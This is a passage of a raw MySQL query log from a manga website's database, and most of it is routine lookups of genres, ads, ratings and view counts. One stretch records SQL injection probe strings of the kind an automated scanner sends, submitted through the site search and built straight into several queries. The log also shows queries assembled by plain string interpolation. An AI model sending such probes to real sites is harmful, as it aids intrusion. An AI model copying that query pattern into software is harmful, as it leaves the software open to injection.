1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652102 Quit 330652103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652103 Quit 330652104 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652104 Quit 330652105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652105 Quit 330652106 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652106 Quit 330652107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652107 Quit 330652108 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652108 Quit 260225 19:29:21 330652109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652109 Quit 330652110 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Sci-fi%') as k where latest_chapter_id > 0 330652110 Quit 330652111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652111 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Sci-fi%' group by manga_id ORDER BY sum(view) DESC 330652111 Quit 330652112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652112 Quit 330652113 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652113 Quit 330652114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330652114 Quit 330652115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652115 Quit 330652116 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1AND//5156((SELECT//CASE//5156//WHEN//5156//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) OR tVb0Fbb5qU', '169.150.196.30', '2026-02-26 03:29:21') 330652116 Quit 330652117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652117 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1AND//5156((SELECT//CASE//5156//WHEN//5156//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) OR tVb0Fbb5qU%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1AND//5156((SELECT//CASE//5156//WHEN//5156//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) OR tVb0Fbb5qU%' ) ) 330652117 Quit 330652118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652118 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'AND/**/5156=(\'~\'||(SELECT/**/CASE/**/5156/**/WHEN/**/5156/**/THEN/**/1/**/ELSE/**/0/**/END/**/FROM/**/RDB$DATABASE)||\'~\') OR \'tVb0Fbb5\'=\'qUvjyKty' 330652118 Quit 330652119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652119 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330652119 Quit 330652120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652120 Quit 330652121 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652121 Quit 330652122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330652122 Quit 330652123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330652123 Quit 330652124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330652124 Quit 330652125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330652125 Quit 330652126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330652126 Quit 330652127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330652127 Quit 330652128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330652128 Quit 330652129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330652129 Quit 330652130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330652130 Quit 330652131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330652131 Quit 330652132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330652132 Quit 330652133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330652133 Quit 330652134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330652134 Quit 330652135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330652135 Quit 330652136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330652136 Quit 330652137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330652137 Quit 330652138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330652138 Quit 330652139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330652139 Quit 330652140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330652140 Quit 330652141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330652141 Quit 330652142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330652142 Quit 330652143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330652143 Quit 330652144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330652144 Quit 330652145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330652145 Quit 330652146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330652146 Quit 330652147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330652147 Quit 330652148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330652148 Quit 330652149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330652149 Quit 330652150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330652150 Quit 330652151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330652151 Quit 330652152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330652152 Quit 330652153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330652153 Quit 330652154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330652154 Quit 330652155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330652155 Quit 330652156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330652156 Quit 330652157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330652157 Quit 330652158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330652158 Quit 330652159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330652159 Quit 330652160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330652160 Quit 330652161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330652161 Quit 330652162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330652162 Quit 330652163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330652163 Quit 330652164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330652164 Quit 330652165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330652165 Quit 330652166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330652166 Quit 330652167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330652167 Quit 330652168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330652168 Quit 330652169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330652169 Quit 330652170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330652170 Quit 330652171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330652171 Quit 330652172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330652172 Quit 330652173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330652173 Quit 330652174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330652174 Quit 330652175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330652175 Quit 330652176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330652176 Quit 330652177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330652177 Quit 330652178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330652178 Quit 330652179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330652179 Quit 330652180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330652180 Quit 330652181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330652181 Quit 330652182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330652182 Quit 330652183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330652183 Quit 330652184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330652184 Quit 330652185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330652185 Quit 330652186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330652186 Quit 330652187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330652187 Quit 330652188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330652188 Quit 330652189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330652189 Quit 330652190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330652190 Quit 330652191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330652191 Quit 330652192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330652192 Quit 330652193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330652193 Quit 330652194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330652194 Quit 330652195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330652195 Quit 330652196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330652196 Quit 330652197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330652197 Quit 330652198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330652198 Quit 330652199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330652199 Quit 330652200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330652200 Quit 330652201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330652201 Quit 330652202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330652202 Quit 330652203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330652203 Quit 330652204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330652204 Quit 330652205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330652205 Quit 330652206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330652206 Quit 330652207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330652207 Quit 330652208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330652208 Quit 330652209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330652209 Quit 330652210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330652210 Quit 330652211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330652211 Quit 330652212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330652212 Quit 330652213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330652213 Quit 330652214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330652214 Quit 330652215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330652215 Quit 330652216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330652216 Quit 330652217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330652217 Quit 330652218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330652218 Quit 330652219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330652219 Quit 330652220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330652220 Quit 330652221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330652221 Quit 330652222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330652222 Quit 330652223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330652223 Quit 330652224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330652224 Quit 330652225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330652225 Quit 330652226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330652226 Quit 330652227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330652227 Quit 330652228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330652228 Quit 330652229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330652229 Quit 330652230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330652230 Quit 330652231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330652231 Quit 330652232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330652232 Quit 330652233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330652233 Quit 330652234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330652234 Quit 330652235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330652235 Quit 330652236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330652236 Quit 330652237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330652237 Quit 330652238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330652238 Quit 330652239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330652239 Quit 330652240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330652240 Quit 330652241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330652241 Quit 330652242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330652242 Quit 330652243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330652243 Quit 330652244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330652244 Quit 330652245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330652245 Quit 330652246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330652246 Quit 330652247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330652247 Quit 330652248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330652248 Quit 330652249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330652249 Quit 330652250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652250 